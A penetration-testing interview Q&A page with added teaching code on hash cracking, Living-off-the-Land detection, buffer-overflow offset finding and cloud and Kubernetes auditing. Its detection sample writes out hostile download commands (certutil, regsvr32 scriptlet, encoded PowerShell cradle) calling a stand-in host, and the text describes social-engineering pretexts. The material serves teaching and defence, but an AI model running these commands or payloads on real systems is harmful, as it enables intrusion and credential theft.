API penetration testing specifically tests RESTful, GraphQL, and SOAP APIs for security vulnerabilities. Common API-specific findings: Broken Object Level Authorisation (BOLA/IDOR — accessing other users' objects), Broken Function Level Authorisation (accessing admin endpoints), Mass Assignment (API accepts and binds unexpected properties to objects, e.g., isAdmin: true), Excessive Data Exposure (returning more fields than needed), Lack of Rate Limiting (brute force, enumeration), broken authentication (JWT algorithm confusion, weak secrets), and improper inventory management (forgotten API versions like /v1 that are less secured). Tools: Postman, Insomnia, Burp Suite, Arjun (hidden parameter discovery), graphql-cop (GraphQL security checks).
Tools & Advanced Techniques
41. What is social engineering in penetration testing?
Social engineering exploits human psychology rather than technical vulnerabilities. Pen test social engineering (requires explicit authorisation): phishing (crafting convincing emails with malicious links or attachments — GoPhish automates phishing campaigns), vishing (phone-based deception — pretending to be IT support to extract credentials), physical tailgating (following authorised personnel through access-controlled doors), pretexting (creating false scenarios — "I'm from IT, I need your password for system maintenance"), and baiting (leaving infected USB drives in car parks). Social engineering tests measure employee security awareness and the effectiveness of security training. Results inform phishing simulation programs and awareness training priorities.
42. What is Wireshark and how is it used in pen testing?
Wireshark is a network protocol analyser that captures and inspects network traffic in real time. In pen testing: capturing credentials sent over unencrypted protocols (HTTP, FTP, Telnet, SMTP without TLS), analysing application protocols for vulnerabilities, identifying cleartext sensitive data, capturing authentication handshakes (NTLM, Kerberos) for offline cracking, analysing malware C2 traffic, verifying encryption is properly implemented, and troubleshooting connectivity issues during testing. Filter syntax: http, tcp.port == 443, ip.addr == 192.168.1.1, http contains "password". tcpdump is the CLI equivalent. Wireshark requires physical network access or a man-in-the-middle position to capture traffic.
43. What is password cracking and what tools are used?
Password cracking recovers plaintext passwords from captured hashes. Tools: Hashcat (GPU-accelerated, fastest for most hash types) and John the Ripper (CPU-based, very broad format support). Attack modes: dictionary (every word in a wordlist such as rockyou.txt or SecLists), rule-based (transformations applied to each word: append digits, capitalise, leetspeak), brute force and mask (all combinations of a character set or a pattern such as ?u?l?l?l?d?d), and combinator (joining words from two wordlists). Common hash formats: NTLM (Windows), MD5, SHA1, bcrypt (deliberately slow), PBKDF2, and Kerberos tickets from Kerberoasting and AS-REP roasting ($krb5tgs$23$..., $krb5asrep$23$...). Unsalted, fast hashes such as NTLM and MD5 fall in seconds on a modern GPU; salted, iterated hashes cost orders of magnitude more per guess and cannot be attacked in bulk with one computation per candidate. Only crack hashes the rules of engagement allow you to crack. Report outcomes in aggregate (how many cracked, common patterns, reused passwords) rather than listing plaintexts, to demonstrate weak password policy.
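What the attack modes do, and why salting and iteration change the economics, is easier to see in a stripped-down cracker than in a Hashcat command line. The block below is an added example written for this page, not Hashcat or John code: it runs a dictionary plus a handful of rules against constructed SHA1 hashes (unsalted) and constructed PBKDF2 hashes (salted and iterated), counting hash operations in each case. The wordlist, rules and target passwords are all made up.

```python
"""Dictionary and rule-based cracking, reduced to its core logic.

Added illustration of the attack modes described above; wordlist, rules and
target hashes are constructed. Hashcat and John do the same work at GPU speed.
"""
import hashlib
import hmac

# Constructed wordlist (a real run streams rockyou.txt or a SecLists file).
WORDLIST = ["password", "winter", "summer", "letmein", "dragon"]

# Rule-based attack: each rule maps a wordlist entry to a candidate, in the
# spirit of Hashcat rules ':' (no-op), 'c' (capitalise), '$1' (append '1').
RULES = [
    lambda w: w,
    lambda w: w.capitalize(),
    lambda w: w + "1",
    lambda w: w + "123",
    lambda w: w.capitalize() + "!",
    lambda w: w.capitalize() + "2024",
]


def candidates(wordlist=WORDLIST, rules=RULES):
    """Yield each (word, rule) product once, in deterministic order."""
    seen = set()
    for word in wordlist:
        for rule in rules:
            cand = rule(word)
            if cand not in seen:
                seen.add(cand)
                yield cand


def sha1_hex(text):
    return hashlib.sha1(text.encode()).hexdigest()


def crack_unsalted(target_hashes, wordlist=WORDLIST, rules=RULES):
    """Unsalted fast hashes (MD5, SHA1, NTLM): hash each candidate once and look
    it up against every target; work grows with candidates, not with targets."""
    targets = set(target_hashes)
    found, work = {}, 0
    for cand in candidates(wordlist, rules):
        work += 1
        digest = sha1_hex(cand)
        if digest in targets:
            found[digest] = cand
            if len(found) == len(targets):
                break
    return found, work


def pbkdf2_hex(text, salt, iterations):
    return hashlib.pbkdf2_hmac("sha256", text.encode(), salt, iterations).hex()


def crack_salted(targets, wordlist=WORDLIST, rules=RULES):
    """Salted, iterated hashes (PBKDF2, bcrypt-style): every candidate has to be
    recomputed per target with that target's salt and cost, so the work is
    candidates x targets x iterations. Each target is (salt, iterations, hex)."""
    found, work = {}, 0
    cand_list = list(candidates(wordlist, rules))
    for salt, iterations, digest in targets:
        for cand in cand_list:
            work += iterations  # one PBKDF2 evaluation costs `iterations` HMACs
            if hmac.compare_digest(pbkdf2_hex(cand, salt, iterations), digest):
                found[digest] = cand
                break
    return found, work


def demo():
    # Constructed targets: two weak passwords and one outside every rule's output.
    unsalted = [sha1_hex("password"), sha1_hex("Winter2024"),
                sha1_hex("correct horse battery staple")]
    u_found, u_work = crack_unsalted(unsalted)

    # Same password, two users, two salts: cracked twice at full cost each time.
    salted = [(b"salt-a", 1000, pbkdf2_hex("Summer!", b"salt-a", 1000)),
              (b"salt-b", 1000, pbkdf2_hex("Summer!", b"salt-b", 1000))]
    s_found, s_work = crack_salted(salted)
    return {
        "unsalted_cracked": sorted(u_found.values()),
        "unsalted_hash_ops": u_work,
        "salted_cracked": sorted(s_found.values()),
        "salted_hash_ops": s_work,
    }


if __name__ == "__main__":
    print(demo())
```

Thirty candidates cover both weak SHA1 hashes in thirty hash operations; the two PBKDF2 targets need 34,000 HMAC evaluations for a 1,000-iteration setting, and a production setting of several hundred thousand iterations multiplies that again. That gap is the whole argument for bcrypt, scrypt, Argon2 or PBKDF2 with a high work factor over unsalted NTLM or MD5.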
44. What is the difference between Nessus and OpenVAS?
Nessus (Tenable) is the most widely used commercial vulnerability scanner, known for accuracy, speed, and a comprehensive plugin library (150,000+ checks). Available as Nessus Essentials (free, 16 IPs), Nessus Professional (paid), and as the core engine of Tenable.sc. OpenVAS (Open Vulnerability Assessment System) is the primary open-source alternative, maintained by Greenbone Networks. It uses the GVM (Greenbone Vulnerability Management) framework and is available free as Greenbone Community Edition. Nessus generally has fewer false positives and more comprehensive coverage; OpenVAS is preferred when cost or open-source licensing is a requirement. Both integrate with pen test workflows for initial vulnerability identification.
45. What is Living off the Land (LotL)?
Living off the Land means using legitimate, pre-installed system binaries and features for attack activity instead of dropping custom malware, which sidesteps anti-virus and EDR controls that key on known-bad files. Windows LOLBins: PowerShell (download cradles, encoded commands), certutil (download files, decode Base64), bitsadmin (file transfer), mshta (execute HTA files), regsvr32 (load remote scriptlets via scrobj.dll), wmic (remote process creation for lateral movement), and schtasks/Task Scheduler (persistence). Linux equivalents: bash, curl/wget, cron, ssh, and Python/Perl where pre-installed. The LOLBAS project (Living Off The Land Binaries, Scripts and Libraries) catalogs these binaries together with the specific command lines that abuse them. Because the binaries are signed and legitimate, detection has to be behavioural: parent/child relationships, unusual command-line arguments, and network connections from binaries that rarely make them, rather than file signatures.
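"Behavioural rather than signature-based" in practice means matching on command lines and parent/child context in process-creation telemetry. The following is an added example for this page, not code from the LOLBAS project or any EDR product: a few command-line rules for the binaries named above, run over constructed process-creation events shaped like Sysmon Event ID 1 records (host names, the 203.0.113.5 TEST-NET-3 address and the encoded PowerShell blob are all made up).

```python
"""Behavioural detection of Living-off-the-Land binary abuse.

Added example built from publicly documented abuse patterns for each binary.
The events below are constructed, not real telemetry; 203.0.113.5 is a
documentation-range (TEST-NET-3) address.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# (rule name, binary, case-insensitive regex applied to the full command line)
LOLBIN_RULES = [
    ("certutil download or decode", "certutil.exe",
     r"-urlcache\b.*(https?://|\\\\)|-decode\b"),
    ("bitsadmin transfer", "bitsadmin.exe", r"/transfer\b"),
    ("mshta remote or inline script", "mshta.exe", r"https?://|javascript:|vbscript:"),
    ("regsvr32 remote scriptlet", "regsvr32.exe", r"/i:\S*https?://|scrobj\.dll"),
    ("wmic remote process creation", "wmic.exe", r"/node:\S+.*process\s+call\s+create"),
    ("powershell encoded or download cradle", "powershell.exe",
     r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|downloadstring|iex\b|invoke-expression"),
]
LOLBINS = {binary for _, binary, _ in LOLBIN_RULES}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def image_name(path):
    """Normalise a Windows image path to its lower-case file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one (host, rule, command_line) alert per rule that matches."""
    alerts = []
    for ev in events:
        image = image_name(ev.image)
        for rule, binary, pattern in LOLBIN_RULES:
            if image == binary and re.search(pattern, ev.command_line, re.IGNORECASE):
                alerts.append((ev.host, rule, ev.command_line))
        # Parent/child context: Office documents do not legitimately spawn these binaries.
        if image_name(ev.parent_image) in OFFICE_PARENTS and image in LOLBINS:
            alerts.append((ev.host, f"office process spawned {image}", ev.command_line))
    return alerts


SYS32 = r"C:\Windows\System32"
# Constructed sample: four abusive command lines and two legitimate ones.
SAMPLE_EVENTS = [
    ProcessEvent("WS-0107", SYS32 + r"\cmd.exe", SYS32 + r"\certutil.exe",
                 "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"),
    ProcessEvent("SRV-PKI-01", SYS32 + r"\cmd.exe", SYS32 + r"\certutil.exe",
                 "certutil.exe -verify -urlfetch cert.cer"),                 # legitimate PKI use
    ProcessEvent("WS-0412", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    ProcessEvent("WS-0107", SYS32 + r"\cmd.exe", SYS32 + r"\regsvr32.exe",
                 "regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"),
    ProcessEvent("SRV-FILE-02", SYS32 + r"\svchost.exe",
                 SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1"),             # scheduled admin script
    ProcessEvent("WS-0412", SYS32 + r"\cmd.exe", SYS32 + r"\wbem\wmic.exe",
                 'wmic.exe /node:fileserver01 process call create "cmd /c whoami"'),
]


if __name__ == "__main__":
    for host, rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmd}")
```

The two legitimate events (a PKI server verifying a certificate, a scheduled backup script) pass, while the Word-spawned encoded PowerShell raises two alerts: one for the command line and one for the parent/child pair. In a real deployment the same rules live in a SIEM or EDR query language and are tuned against a baseline of what each host normally runs.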
46. What is an engagement scope document?
An engagement scope document (Statement of Work or Rules of Engagement document) formally defines the boundaries of a penetration test. It specifies: target IP ranges and FQDNs (explicitly listed in-scope systems), out-of-scope systems (production databases, third-party hosted services, specific critical servers), authorised testing techniques (network scanning, web app testing, social engineering, physical — each may require separate authorisation), excluded techniques (denial of service, data destruction, production database modification), testing windows (hours, start/end dates), emergency stop procedures, point of contact for authorisation questions, data handling requirements, and post-test deliverables. Never begin testing without a signed scope document.
47. What is exploit development?
Exploit development is the process of creating custom code to take advantage of a software vulnerability. Phases: vulnerability research (finding the flaw through code review, fuzzing, or reverse engineering), understanding the vulnerability (memory layout, crash analysis), developing a proof of concept (triggering the crash reliably), controlling execution (locating and overwriting the return address or a function pointer), finding code gadgets (ROP chains to bypass DEP/NX), bypassing ASLR (address space layout randomisation, typically via an information leak or a partial overwrite), writing or selecting the shellcode payload, and stabilising the exploit across versions and environments. Tools: pwndbg/peda (GDB plugins), pwntools (Python exploit development library), radare2/Ghidra (reverse engineering). Exploit development is an advanced skill requiring a deep understanding of memory, assembly, and operating system internals.
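The step from "it crashes" to "I control the return address" is usually done with a cyclic pattern: send a De Bruijn sequence instead of junk, read the instruction pointer out of the debugger, and look the value up to get the exact offset. The block below is an added example for this page; it reimplements the idea behind pwntools' cyclic() and cyclic_find() in plain Python rather than calling pwntools. The crash is simulated (the buffer layout, the 120-byte offset and the 0x401136 target address are constructed), so the code runs without a vulnerable binary.

```python
"""Locating the saved-return-address offset with a cyclic (De Bruijn) pattern.

Added example, not from the page or pwntools; the crash is simulated by
reading the "instruction pointer" out of the pattern itself, and the buffer
layout and target address are constructed.
"""
import string
import struct

ALPHABET = string.ascii_lowercase.encode()
N = 4  # every 4-byte window of the pattern is unique (26**4 = 456976 windows)


def de_bruijn(alphabet=ALPHABET, n=N):
    """De Bruijn sequence B(k, n): every length-n string over the alphabet
    occurs exactly once, so any n-byte window identifies its own position."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = bytearray()

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(seq)


_PATTERN = de_bruijn()


def cyclic(length):
    """First `length` bytes of the pattern, sent in place of the fuzz buffer."""
    if length > len(_PATTERN):
        raise ValueError("pattern exhausted; use a larger alphabet or n")
    return _PATTERN[:length]


def cyclic_find(value):
    """Offset of a 4-byte window taken from a crash register. Accepts raw bytes
    or the integer a debugger prints (EIP on 32-bit, or the 8-byte window read
    from RSP on 64-bit, of which the low 4 bytes are enough)."""
    if isinstance(value, int):
        value = struct.pack("<Q", value) if value > 0xFFFFFFFF else struct.pack("<I", value)
    return _PATTERN.find(value[:N])


def build_payload(offset, return_address, bits=64):
    """Padding up to the saved return address, followed by the new one."""
    fmt = "<Q" if bits == 64 else "<I"
    return b"A" * offset + struct.pack(fmt, return_address)


def demo():
    probe = cyclic(300)
    # Simulated crash: the vulnerable function copies `probe` into a 112-byte
    # stack buffer and the saved return address happens to sit at offset 120
    # (constructed layout). A debugger would show this value in EIP.
    SAVED_RET_OFFSET = 120
    eip = struct.unpack("<I", probe[SAVED_RET_OFFSET:SAVED_RET_OFFSET + 4])[0]
    offset = cyclic_find(eip)          # recovered from the register value alone
    # Hypothetical address of a target function in a non-PIE binary.
    payload = build_payload(offset, 0x401136)
    return {"eip": hex(eip), "offset": offset, "payload_len": len(payload)}


if __name__ == "__main__":
    print(demo())
```

With pwntools installed the same workflow is `cyclic(300)`, crash, `cyclic_find(0x...)`, then `flat({offset: p64(addr)})`; the hand-rolled version just makes it clear that the lookup works because no 4-byte window repeats.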
48. What is container security testing?
Container security testing evaluates Docker and Kubernetes environments for misconfigurations and vulnerabilities. Common findings: containers running as root (root inside the container becomes root on the host the moment any isolation boundary is crossed), privileged containers (full device and kernel access), excessive Linux capabilities (CAP_SYS_ADMIN in particular), sensitive host path mounts (/var/run/docker.sock mounted inside a container gives control of the Docker daemon and therefore of the host), container registries exposed without authentication, unpatched base images with known CVEs, secrets in environment variables or image layers, missing CPU/memory limits, Kubernetes RBAC misconfigurations (over-permissive service accounts, the default service account token mounted into every pod), and network policies absent or not enforced by the CNI plugin. Tools: Trivy (image and IaC scanning), kube-bench (CIS Kubernetes Benchmark checks), Falco (runtime detection).
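Most of the findings above are visible in the pod spec before anything runs. The following is an added example for this page, not code from kube-bench or Trivy: a static audit of a pod manifest that flags each of the listed misconfigurations, run against a constructed risky pod and a constructed hardened one. The manifests are Python dicts in the shape `kubectl get pod -o json` returns, so the script needs neither PyYAML nor a cluster; names and images are made up.

```python
"""Static audit of a Kubernetes pod spec for the misconfigurations above.

Added example; both manifests are constructed dicts in the shape kubectl
returns as JSON. Pod names, namespaces and images are made up.
"""

RUNTIME_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock", "/run/containerd/containerd.sock"}
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}


def audit_pod(pod):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    findings = []
    spec = pod.get("spec", {})
    pod_sc = spec.get("securityContext", {})

    if any(spec.get(k) for k in ("hostPID", "hostNetwork", "hostIPC")):
        findings.append("pod shares a host namespace (hostPID/hostNetwork/hostIPC)")
    if spec.get("automountServiceAccountToken", True):
        findings.append("service account token auto-mounted (Kubernetes default)")

    for vol in spec.get("volumes", []):
        host_path = vol.get("hostPath")
        if not host_path:
            continue
        path = host_path.get("path", "").rstrip("/")
        if path in RUNTIME_SOCKETS:
            findings.append(f"volume {vol['name']}: container runtime socket mounted ({path}), equivalent to host root")
        else:
            findings.append(f"volume {vol['name']}: hostPath mount of {path}")

    for c in spec.get("containers", []):
        name = c.get("name", "?")
        sc = {**pod_sc, **c.get("securityContext", {})}   # container level overrides pod level
        if sc.get("privileged"):
            findings.append(f"{name}: privileged container")
        uid = sc.get("runAsUser")
        if uid == 0:
            findings.append(f"{name}: runs as root (runAsUser 0)")
        elif uid is None and not sc.get("runAsNonRoot"):
            findings.append(f"{name}: may run as root (runAsNonRoot unset; depends on the image's USER)")
        if sc.get("allowPrivilegeEscalation", True):
            findings.append(f"{name}: allowPrivilegeEscalation not set to false")
        added = {cap.upper() for cap in sc.get("capabilities", {}).get("add", [])}
        if added & DANGEROUS_CAPS:
            findings.append(f"{name}: dangerous capabilities added {sorted(added & DANGEROUS_CAPS)}")
        if not c.get("resources", {}).get("limits"):
            findings.append(f"{name}: no CPU/memory limits")
        image = c.get("image", "")
        tag_part = image.rsplit("/", 1)[-1]
        if ":" not in tag_part or tag_part.endswith(":latest"):
            findings.append(f"{name}: image {image!r} not pinned to a version tag or digest")
    return findings


# Constructed "debug" pod of the kind found left behind in real clusters.
RISKY_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "debug-tools", "namespace": "default"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "dockersock", "hostPath": {"path": "/var/run/docker.sock"}}],
        "containers": [{
            "name": "shell", "image": "ubuntu:latest", "command": ["sleep", "infinity"],
            "securityContext": {"privileged": True, "capabilities": {"add": ["SYS_ADMIN"]}},
            "volumeMounts": [{"name": "dockersock", "mountPath": "/var/run/docker.sock"}],
        }],
    },
}

# Constructed hardened equivalent of an application pod.
HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "payments-api", "namespace": "payments"},
    "spec": {
        "automountServiceAccountToken": False,
        "containers": [{
            "name": "api", "image": "registry.example.test/payments-api:1.4.2",
            "securityContext": {"runAsNonRoot": True, "runAsUser": 10001,
                                "allowPrivilegeEscalation": False,
                                "capabilities": {"drop": ["ALL"]}},
            "resources": {"limits": {"cpu": "500m", "memory": "256Mi"}},
        }],
    },
}

if __name__ == "__main__":
    for pod in (RISKY_POD, HARDENED_POD):
        print(pod["metadata"]["name"], audit_pod(pod) or ["no findings"])
```

Against a live cluster the same checks run over `kubectl get pods -A -o json`; the docker.sock and privileged findings are the ones to chase first, since either gives a path from the pod to the node.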
49. What is cloud penetration testing?
Cloud penetration testing assesses cloud infrastructure (AWS, Azure, GCP) and must also respect each provider's own penetration-testing policy. Key areas: IAM misconfiguration (over-permissive policies, unused access keys, role trust policies that let any AWS principal assume the role), storage misconfigurations (public S3 buckets or Azure Blob containers holding sensitive data), metadata service exploitation (SSRF to 169.254.169.254 to read instance-role credentials; on AWS, enforcing IMDSv2 defeats the simple GET-based variant because a session token must first be obtained with a PUT request), exposed services (EC2 security groups allowing 0.0.0.0/0 to all ports), serverless function vulnerabilities and over-privileged execution roles, container misconfigurations (ECS task definitions with excessive permissions), and API keys leaked in code repositories. Tools: Pacu (AWS exploitation framework), ScoutSuite (multi-cloud auditing), CloudSploit, Prowler.
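The IAM and security-group findings above are, at bottom, pattern checks over JSON the cloud APIs return. The block below is an added example for this page, not code from Pacu, ScoutSuite or Prowler: it audits constructed IAM identity policies, role trust policies and a security group for wildcard admin grants, escalation-capable actions on Resource "*", roles assumable by any AWS principal, and ports open to the whole internet. Account IDs, names and group IDs are made up.

```python
"""Static checks for the cloud IAM and network findings described above.

Added example; the documents are constructed JSON in the shapes returned by
GetPolicyVersion, GetRole (AssumeRolePolicyDocument) and
DescribeSecurityGroups. Account IDs, role names and group IDs are made up.
"""


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]


def audit_identity_policy(policy):
    """Flag wildcard grants and escalation-capable actions on Resource '*'."""
    findings = []
    escalators = {"iam:passrole", "iam:createpolicyversion", "iam:attachuserpolicy",
                  "iam:attachrolepolicy", "iam:putuserpolicy", "sts:assumerole"}
    for i, st in enumerate(_as_list(policy.get("Statement", []))):
        if st.get("Effect") != "Allow" or "*" not in _as_list(st.get("Resource", [])):
            continue
        actions = [a.lower() for a in _as_list(st.get("Action", []))]
        if "*" in actions:
            findings.append(f"statement {i}: full administrative access (Action * on Resource *)")
            continue
        service_wide = sorted(a for a in actions if a.endswith(":*"))
        if service_wide:
            findings.append(f"statement {i}: service-wide wildcards {service_wide} on Resource *")
        hits = sorted(escalators & set(actions))
        if hits:
            findings.append(f"statement {i}: privilege-escalation-capable actions {hits} on Resource *")
    return findings


def audit_trust_policy(role_name, trust):
    """Principal '*' with no Condition means any principal in any AWS account can assume the role."""
    findings = []
    for st in _as_list(trust.get("Statement", [])):
        actions = [a.lower() for a in _as_list(st.get("Action", []))]
        if st.get("Effect") != "Allow" or "sts:assumerole" not in actions:
            continue
        principal = st.get("Principal", {})
        values = ["*"] if principal == "*" else [v for vals in principal.values() for v in _as_list(vals)]
        if "*" in values:
            if st.get("Condition"):
                findings.append(f"{role_name}: wildcard principal limited only by a Condition block; review it")
            else:
                findings.append(f"{role_name}: assumable by any AWS principal (Principal * without Condition)")
    return findings


def audit_security_group(sg):
    """Flag inbound rules open to the whole internet (IPv4 or IPv6)."""
    findings = []
    for perm in sg.get("IpPermissions", []):
        cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])] + \
                [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
        if not any(c in ("0.0.0.0/0", "::/0") for c in cidrs):
            continue
        proto, lo, hi = perm.get("IpProtocol"), perm.get("FromPort"), perm.get("ToPort")
        if proto == "-1" or (lo == 0 and hi == 65535):
            findings.append(f"{sg['GroupId']}: all traffic open to the internet")
        elif lo in (22, 3389, 3306, 5432, 6379, 27017):
            findings.append(f"{sg['GroupId']}: admin/database port {lo} open to the internet")
        # 80/443 to 0.0.0.0/0 is expected on a public web tier and is not flagged.
    return findings


# Constructed inputs.
ADMIN_POLICY = {"Version": "2012-10-17",
                "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
DEVELOPER_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::app-assets-example/*"},
    {"Effect": "Allow", "Action": ["ec2:*", "iam:PassRole"], "Resource": "*"},
]}
TRUST_OPEN = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "sts:AssumeRole"}]}
TRUST_SCOPED = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
     "Action": "sts:AssumeRole",
     "Condition": {"StringEquals": {"sts:ExternalId": "example-external-id"}}}]}
SECURITY_GROUP = {"GroupId": "sg-0123456789abcdef0", "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432, "IpRanges": [{"CidrIp": "10.0.0.0/8"}]},
]}

if __name__ == "__main__":
    for line in (audit_identity_policy(ADMIN_POLICY) + audit_identity_policy(DEVELOPER_POLICY)
                 + audit_trust_policy("DeployRole", TRUST_OPEN)
                 + audit_trust_policy("PartnerRole", TRUST_SCOPED) + audit_security_group(SECURITY_GROUP)):
        print(line)
```

The iam:PassRole finding is the one most often missed: combined with permission to launch an instance or a Lambda, it lets a low-privileged principal attach an administrative role to a resource they control, which is exactly the escalation path tools like Pacu automate.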
50. How do you stay current with new vulnerabilities and exploits?
Staying current in penetration testing requires continuous learning: following CVE and NVD feeds for new disclosures, reading security research blogs (Project Zero, NCC Group, OffSec, PortSwigger Web Security Blog), monitoring the security community on Twitter/X and Mastodon, following exploit databases (Exploit-DB, Packet Storm), practising on CTF and lab platforms (Hack The Box, TryHackMe, PentesterLab), studying published penetration test and red team reports (several firms release sanitised examples), reading offensive security research papers, participating in bug bounty programmes (HackerOne, Bugcrowd), and pursuing certifications (OSCP, the Offensive Security Certified Professional, is widely regarded as the benchmark for hands-on testing; CEH, eJPT, and BSCP, the Burp Suite Certified Practitioner, for web). The field evolves rapidly, and continuous hands-on practice is essential.